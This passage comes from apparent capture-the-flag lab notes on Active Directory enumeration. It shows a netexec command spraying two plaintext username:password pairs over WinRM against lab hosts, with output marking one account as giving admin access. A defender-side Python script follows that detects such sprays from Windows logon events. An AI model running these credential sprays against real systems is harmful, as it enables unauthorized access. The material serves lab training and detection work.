AD Enumeration

WinRM

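We test the two username and password pairs we know against WinRM on every host. With --no-bruteforce, netexec pairs each username with the password on the same line instead of trying every combination.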

netexec winrm ../../hosts -u usernames -p passwords --no-bruteforce --continue-on-success 
WINRM       192.168.110.54  5985   PNT-SVRPSB       [*] Windows Server 2022 Build 20348 (name:PNT-SVRPSB) (domain:painters.htb)
WINRM       192.168.110.53  5985   PNT-SVRBPA       [*] Windows Server 2022 Build 20348 (name:PNT-SVRBPA) (domain:painters.htb)
WINRM       192.168.110.55  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:painters.htb)
WINRM       192.168.110.52  5985   PNT-SVRSVC       [*] Windows Server 2022 Build 20348 (name:PNT-SVRSVC) (domain:painters.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.110.54  5985   PNT-SVRPSB       [-] painters.htb\riley:P@ssw0rd
WINRM       192.168.110.54  5985   PNT-SVRPSB       [-] painters.htb\web_svc:!QAZ1qaz
WINRM       192.168.110.55  5985   DC               [-] painters.htb\riley:P@ssw0rd
WINRM       192.168.110.55  5985   DC               [-] painters.htb\web_svc:!QAZ1qaz
WINRM       192.168.110.53  5985   PNT-SVRBPA       [-] painters.htb\riley:P@ssw0rd
WINRM       192.168.110.53  5985   PNT-SVRBPA       [-] painters.htb\web_svc:!QAZ1qaz
WINRM       192.168.110.52  5985   PNT-SVRSVC       [-] painters.htb\riley:P@ssw0rd
WINRM       192.168.110.52  5985   PNT-SVRSVC       [+] painters.htb\web_svc:!QAZ1qaz (Pwn3d!)
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
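
What this sweep looks like from the defender's side, as an added example that is not part of the original notes: it flags one source failing logons across several hosts in a short window and reports any success in that window. The records are constructed and simplified (hosts and accounts mirror the output above; source addresses, timestamps and thresholds are assumptions), using Windows Security event IDs 4625 (failed logon) and 4624 (successful logon).

```python
from collections import defaultdict
from datetime import datetime, timedelta

T0 = datetime(2024, 1, 1, 12, 0, 0)  # constructed timestamp
SRC = "10.10.14.5"                   # constructed source address

def ev(sec, event_id, host, account, src=SRC):
    """Simplified logon record: 4625 = failed logon, 4624 = successful logon."""
    return {"time": T0 + timedelta(seconds=sec), "id": event_id,
            "host": host, "account": account, "src": src}

# Constructed events: hosts and accounts mirror the netexec output above.
EVENTS = [
    ev(0, 4625, "PNT-SVRPSB", "riley"), ev(0, 4625, "PNT-SVRPSB", "web_svc"),
    ev(1, 4625, "DC", "riley"),         ev(1, 4625, "DC", "web_svc"),
    ev(1, 4625, "PNT-SVRBPA", "riley"), ev(2, 4625, "PNT-SVRBPA", "web_svc"),
    ev(2, 4625, "PNT-SVRSVC", "riley"), ev(2, 4624, "PNT-SVRSVC", "web_svc"),
    # Unrelated single mistyped password from another (constructed) host.
    ev(900, 4625, "PNT-SVRBPA", "riley", src="192.168.110.77"),
]

def find_sprays(events, window=timedelta(minutes=5), min_hosts=3, min_failures=5):
    """Return one alert per source that fails logons on many hosts within `window`."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        for first in evs:
            # All events from this source in the window starting at `first`.
            win = [e for e in evs
                   if timedelta(0) <= e["time"] - first["time"] <= window]
            fails = [e for e in win if e["id"] == 4625]
            hosts = {e["host"] for e in fails}
            if len(fails) >= min_failures and len(hosts) >= min_hosts:
                alerts.append({
                    "src": src,
                    "failures": len(fails),
                    "hosts": sorted(hosts),
                    "accounts": sorted({e["account"] for e in fails}),
                    # A success in the same window is the credential that worked.
                    "successes": sorted({(e["host"], e["account"])
                                         for e in win if e["id"] == 4624}),
                })
                break  # one alert per source is enough
    return alerts

if __name__ == "__main__":
    for alert in find_sprays(EVENTS):
        print(alert)
```

The `successes` entry is the part to act on first: it names the host and account to contain and whose password needs rotating.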

Bloodhound
